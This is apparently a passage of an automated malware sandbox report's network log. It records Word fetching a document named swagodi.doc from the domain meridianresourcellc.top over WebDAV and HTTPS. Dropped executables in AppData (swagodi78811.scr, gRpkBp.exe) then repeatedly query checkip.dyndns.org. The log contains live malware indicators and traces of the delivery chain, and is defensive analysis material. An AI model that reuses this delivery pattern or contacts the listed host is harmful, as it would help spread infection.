                                              Jul 26, 2024 23:45:47.043627977 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ec5a3eca9f3b6b326c167937f545a709
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.2249191132.226.247.73803880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:45.711668968 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:46.386826992 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e11c1a38741ece346ca89fb883e912b
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:46.605454922 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e11c1a38741ece346ca89fb883e912b
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.2249195193.122.130.0802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:47.523673058 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:47.997226000 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e4976ce56f7811441ff0405c1bd3f8c
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:48.203905106 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8e4976ce56f7811441ff0405c1bd3f8c
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.2249197132.226.247.73802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:48.703653097 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:49.378026962 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bbb58a33e06dad190c725d08fbca39d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:49.587779999 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bbb58a33e06dad190c725d08fbca39d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.2249199132.226.247.73802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:50.071681023 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:51.685719967 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:51.685988903 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:51.686393023 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:51.686778069 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cfd3e4f5e9b15dce43411d6460999728
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.2249201193.122.130.0802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:52.398821115 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:52.860874891 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:52 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9b01ea5599a44c6e7894686bf275181f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:53.071516037 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:52 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9b01ea5599a44c6e7894686bf275181f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249161104.21.52.88443748C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:05 UTC145OUTOPTIONS / HTTP/1.1
                                              User-Agent: Microsoft Office Protocol Discovery
                                              Host: meridianresourcellc.top
                                              Content-Length: 0
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:05 UTC719INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:05 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JSdlzVSvhbffSLDxpcUNtAwB1nj6QlHKiYOWrRI2O5Tzf6BmOo45RlFZRM2a4FsXeqN4pYpjX2L4xYUpmQoGJ85pHEMDL2VTQWbDD1FGR%2BdeuloELuGlVQZqvdH1Pjyy6KQeHxxQwcvcfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793222f1c0f90-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249162172.67.197.72443748C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:08 UTC135OUTHEAD /swagodi.doc HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft Office Existence Discovery
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:08 UTC853INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:08 GMT
                                              Content-Type: application/msword
                                              Content-Length: 711568
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 01:21:05 GMT
                                              ETag: "66a2fa01-adb90"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 66361
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25Bti9iVQ%2B%2Ftk8mT3m2hWfizwWK3pyWoosxGtt8QefgPfgtIQAPWCWVUrZkS03NNjtLnsi1FqgogWuITVYLM%2BablyKCDeIfVFNrrlf7Mp5v4jh0E2kZ9a9YV%2B7DNti8XC58P9UYl561RoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a979333f9fc4375-EWR
                                              alt-svc: h3=":443"; ma=86400


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192.168.2.2249163104.21.52.88443
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:12 UTC140OUTOPTIONS / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                              translate: f
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:13 UTC729INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:13 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fjW7GyfMpPq3HDavzIlWnOqIeVHIi2SA4Q2XFkzFGkvYIjteaf5K125v8a5kTvnAG%2Bby0Xy0jTiKVXx15%2B3yoQ%2Fe4qPlw56vWi9BlLV%2FQOeQL3sQBudlZZoKI%2FqhLcj6ndRbalpNjU%2Bkmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a97934f5a51197c-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3192.168.2.2249164104.21.52.88443
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:13 UTC170OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 65 72 69 64 69 61 6e 72 65 73 6f 75 72 63 65 6c 6c 63 2e 74 6f 70 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: meridianresourcellc.top
                                              2024-07-26 21:45:14 UTC742INHTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:14 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLYGWhyaPAdzx81SI%2Bx4I5Y1g1JcsrbCrwjcKftRSAUfOLX7tRhMd1a4qxuqrNQmdyq52V0kDVqK2r3GdIof2zP2uFNLni%2FaWxnfSdk1fZDb2CrJxWRXdfi3MYE47H1jbeufSXlD58Bdfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793568fcd43a5-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:14 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                              Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192.168.2.2249165104.21.52.88443
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:15 UTC170OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 65 72 69 64 69 61 6e 72 65 73 6f 75 72 63 65 6c 6c 63 2e 74 6f 70 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: meridianresourcellc.top
                                              2024-07-26 21:45:15 UTC742INHTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSgsQGDe5jhP50qqbdlZGxgDKSPLkhvMkg89hwWfJiEzjRXz6Kapz5hZYaoaJmmp4WU1qWlZzeD15gVYSlMHq9fcjzRq3emEGjAuu8WArJgQYX%2FyddiWPwmmXpbURQsOd%2BgnOxcbVvv90g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a97935f485042a7-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:15 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                              Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.2249166104.21.52.88443748C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-07-26 21:45:16 UTC365OUTGET /swagodi.doc HTTP/1.1
                                              Accept: */*
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              Host: meridianresourcellc.top
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:16 UTC847INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:16 GMT
                                              Content-Type: application/msword
                                              Content-Length: 711568
                                              Connection: close
                                              Last-Modified: Fri, 26 Jul 2024 01:21:05 GMT
                                              ETag: "66a2fa01-adb90"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 66369
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBHI3ikGGI8lpg0fufmVZzJ%2BexoDZSkNGjkLtVCLHiD2SK0M73amRRr6pjDa2B1MGkCPA0D95x8nWlwck9QpL5WG4yJXbVc4MaXiWMB2YuamHfd5btGDnSNAw7v5ro3OXGgMsVkLu1ybZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793673f7fc327-EWR
                                              alt-svc: h3=":443"; ma=86400
